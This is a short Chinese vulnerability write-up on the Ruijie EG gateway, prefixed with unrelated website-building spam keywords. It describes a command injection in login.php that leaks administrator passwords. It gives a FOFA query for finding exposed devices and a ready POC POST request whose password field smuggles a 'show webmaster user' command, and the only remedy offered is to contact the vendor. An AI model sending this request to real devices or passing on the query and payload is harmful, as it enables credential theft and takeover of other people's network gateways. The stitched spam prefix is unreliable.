买布自己做网站衣服的,郴州网站设计公司,网站建设主要有哪些成本,常州网站设计平台Nx01 产品简介 锐捷EG易网关是一款综合网关#xff0c;由锐捷网络完全自主研发。它集成了先进的软硬件体系架构#xff0c;配备了DPI深入分析引擎、行为分析/管理引擎#xff0c;可以在保证网络出口高效转发的条件下#xff0c;提供专业的流控功能、出色的URL过滤以及本地化…Nx01 产品简介 锐捷EG易网关是一款综合网关由锐捷网络完全自主研发。它集成了先进的软硬件体系架构配备了DPI深入分析引擎、行为分析/管理引擎可以在保证网络出口高效转发的条件下提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。
Nx02 漏洞描述 锐捷EG易网关login.php存在 CLI命令注入导致管理员账号密码泄露漏洞。
Nx03 产品主页
fofa-query: appRuijie-EG易网关 body/login.php?aversion Nx04 漏洞复现
POC
POST /login.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Go-http-client/1.1
Content-Length: 52
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzipusernameadminpassworda?showwebmasteruser Nx05 修复建议
建议联系软件厂商进行处理。
